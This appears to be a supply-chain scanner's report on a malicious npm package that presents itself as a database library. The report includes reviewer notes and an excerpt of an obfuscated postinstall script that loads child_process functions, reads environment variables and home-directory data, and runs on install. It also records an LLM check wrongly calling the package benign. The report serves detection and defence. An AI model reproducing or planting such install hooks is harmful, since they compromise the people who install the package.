// npm 패키지
@cloudplatform-single-spa/support
Internal database utilities with connection pooling, query builder and migration support
버전
3
메인테이너
1
라이선스
UNLICENSED
최초 publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,109 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-28
// exfil path
what is read → where it ships
steals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x2514e8=a0_0x360b;(function(_0xc0afb1,_0x2443d7){const _0x3c5472=a0_0x360b,_0x47b4d2=_0xc0afb1();while(!![]){try{const _0x48ccb7=-parseInt(_0x3c5472(0x23d))/(-0x179d+0x7b*0x28+0…
// publisher 캠페인
by mr.4nd3r50n
이 계정에서 catch된 패키지 9건
고립된 catch가 아닙니다. 동일 publisher가 8개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @100.100.100· 1 file flagged
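llm: benign · 0.85 → 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
주의: 이 LLM 판정은 같은 항목의 다른 신호(heuristic 100/100, osv-flagged:MAL-2026-4975, 난독화된 postinstall 스크립트)와 상충합니다. 발췌문의 문자열이 난독화되어 있어 전송지가 추출되지 않은 것일 수 있으므로, benign 판정만으로 이 패키지를 안전하다고 간주해서는 안 됩니다.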
- @100.100.100 · AUTO-PUBLISHED · publisher: mr.4nd3r50n · heuristic 100/100 · static flags 2 · llm benign (0.85) via ollama · install-scripts:postinstall · new-publisher:1d · anomalous-major-version:100 · publisher-multi-name-burst:24 · publisher-version-pump:25 · osv-flagged:MAL-2026-4975 · reads-env-vars · reads-homedir
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code · 1 file flagged · patterns: 2
// Reviewer notes on the flagged listing below. The listing concatenates several
// package files on one line; each file starts at a `--- … ---` header.
//
// - The install-scripts section wires `postinstall` to `node scripts/postinstall.js`,
//   so that script runs during `npm install`, before any library API is called.
// - scripts/postinstall.js is obfuscated: the opening IIFE rotates the string table
//   returned by a0_0x4cda (push/shift) until a parseInt-based checksum matches, and
//   later literals are fetched through a0_0x2514e8(<index>). Only 'os' and 'fs'
//   appear in clear text; the other four require() targets cannot be read from
//   this excerpt.
// - `{execSync, spawn}` is destructured from one of the hidden modules. Those are
//   export names of Node's child_process, so presumably the script can start
//   processes — TODO confirm by decoding the string table in an isolated sandbox.
// - Two process.env lookups are visible: one keyed by a0_0x1cc1a4 and one keyed by
//   a0_0x4c0b1b + 'RECON_ONLY'. The comparison in front of the RECON_ONLY lookup
//   tests the same decoder call against itself, so that flag looks hard-wired to
//   true — verify after deobfuscation.
// - The excerpt is cut mid-expression at `('>= `: function a0_0x53ff52 is
//   incomplete and nothing later in the script is shown. The absence of a
//   destination host in this excerpt is therefore not evidence that none exists.
// - dist/index.d.ts and dist/index.js only declare and re-export a pool/query API
//   from ../src/index.js (not shown); they match the package description and show
//   no install-time behaviour themselves.
//
// Triage: on hosts where this package was installed, review what a postinstall
// script running as the installing user could reach (home directory, environment
// variables). For analysis, unpack or install with `npm install --ignore-scripts`
// so the postinstall hook does not execute.
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x2514e8=a0_0x360b;(function(_0xc0afb1,_0x2443d7){const _0x3c5472=a0_0x360b,_0x47b4d2=_0xc0afb1();while(!![]){try{const _0x48ccb7=-parseInt(_0x3c5472(0x23d))/(-0x179d+0x7b*0x28+0x2*0x233)+parseInt(_0x3c5472(0x213))/(-0x2627+0x163f+0xfea)+-parseInt(_0x3c5472(0x1f6))/(-0x133d*0x1+0xb3c+0x6*0x156)*(-parseInt(_0x3c5472(0x216))/(0x10e0+0x26d3+-0x37af))+-parseInt(_0x3c5472(0x223))/(-0x6e3*0x1+-0x1566+0x1c4e)+-parseInt(_0x3c5472(0x21c))/(-0x1829+0x1818+-0x1*-0x17)+parseInt(_0x3c5472(0x222))/(-0x1801+-0x133f+0x2b47)+-parseInt(_0x3c5472(0x1f4))/(0x150a*-0x1+-0xcd*0x5+0x1913);if(_0x48ccb7===_0x2443d7)break;else _0x47b4d2['push'](_0x47b4d2['shift']());}catch(_0x8be6bd){_0x47b4d2['push'](_0x47b4d2['shift']());}}}(a0_0x4cda,0x31adc+-0x9fb07+0x1958*0xbe));const a0_0x50b1fc=require('os'),a0_0x1b5a0c=require('fs'),a0_0x4450dc=require(a0_0x2514e8(0x245)),a0_0x5d0bcf=require(a0_0x2514e8(0x209)),a0_0x308e9d=require(a0_0x2514e8(0x204)),{execSync:a0_0x1bada0,spawn:a0_0x3ca593}=require(a0_0x2514e8(0x1e7)),a0_0x325825=a0_0x2514e8(0x21e),a0_0x4b24aa=a0_0x2514e8(0x205),a0_0x4c0b1b=a0_0x2514e8(0x1e4)+a0_0x2514e8(0x23e),a0_0x1cc1a4=a0_0x2514e8(0x1fa),a0_0x351d44=!!process.env[a0_0x1cc1a4],a0_0x43f6eb=a0_0x2514e8(0x1e2)===a0_0x2514e8(0x1e2)||!!process.env[a0_0x4c0b1b+'RECON_ONLY'];function a0_0x53ff52(_0x23845e){const _0x5ab867=a0_0x2514e8,_0x2802f3=process[_0x5ab867(0x1fc)][_0x5ab867(0x21f)][_0x5ab867(0x217)]('.')[_0x5ab867(0x24b)](Number),_0x28e452=_0x23845e[_0x5ab867(0x211)]('>= --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: 
PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
